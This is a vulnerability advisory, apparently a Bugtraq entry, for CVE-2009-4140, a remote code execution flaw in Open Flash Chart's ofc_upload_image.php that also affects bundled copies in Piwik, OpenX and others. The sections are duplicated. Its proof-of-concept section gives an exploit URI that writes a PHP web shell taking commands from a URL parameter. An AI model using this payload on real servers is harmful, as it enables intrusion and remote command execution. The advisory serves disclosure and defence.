Open Flash Chart 'ofc_upload_image.php' Remote PHP Code Execution Vulnerability
BID:37314
Info
Open Flash Chart 'ofc_upload_image.php' Remote PHP Code Execution Vulnerability
| Bugtraq ID: | 37314 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4140 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2009 12:00AM |
| Updated: | Dec 02 2013 01:49AM |
| Credit: | Braeden Thomas |
| Vulnerable: |
Piwik Piwik 0.4.3 Piwik Piwik 0.4.2 Piwik Piwik 0.4.1 Piwik Piwik 0.4 Piwik Piwik 0.2.37 Piwik Piwik 0.2.36 Piwik Piwik 0.2.35 OpenX OpenX Video Plugin 0 OpenX OpenX 2.8.2 OpenX OpenX 2.8.6 OpenX OpenX 2.8.5 OpenX OpenX 2.8.4 OpenX OpenX 2.8.3 Open Web Analytics Open Web Analytics 1.2.0 Open Flash Chart Open Flash Chart 2.0 Joobi Ltd jNews 0 CiviCRM CiviCRM 3.3.3 |
| Not Vulnerable: |
Piwik Piwik 0.4.4 OpenX OpenX 2.8.7 Open Web Analytics Open Web Analytics SVN |
Discussion
Open Flash Chart 'ofc_upload_image.php' Remote PHP Code Execution Vulnerability
Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also be affected.
Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also be affected.
Exploit / POC
Open Flash Chart 'ofc_upload_image.php' Remote PHP Code Execution Vulnerability
Attackers may exploit this issue through a browser.
The following example URI and exploit code are available:
http://www.example.com/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>
Attackers may exploit this issue through a browser.
The following example URI and exploit code are available:
http://www.example.com/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>
Solution / Fix
Open Flash Chart 'ofc_upload_image.php' Remote PHP Code Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
NOTE: The vulnerable script has been removed from Piwik 0.4.4 and Open Web Analytics SVN.
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
NOTE: The vulnerable script has been removed from Piwik 0.4.4 and Open Web Analytics SVN.
References
Open Flash Chart 'ofc_upload_image.php' Remote PHP Code Execution Vulnerability
References:
References:
- Kritische Sicherheitslucke in OpenX 2.8.6 & Open Flash Chart 2 (Florian Sander)
- OpenX Homepage (OpenX)
- OpenX Video Plugin -Homepage (OpenX)
- Piwik 0.4.4, response to Secunia Advisory SA37078 (Piwik)
- Vendor Homepage (Open Flash Chart)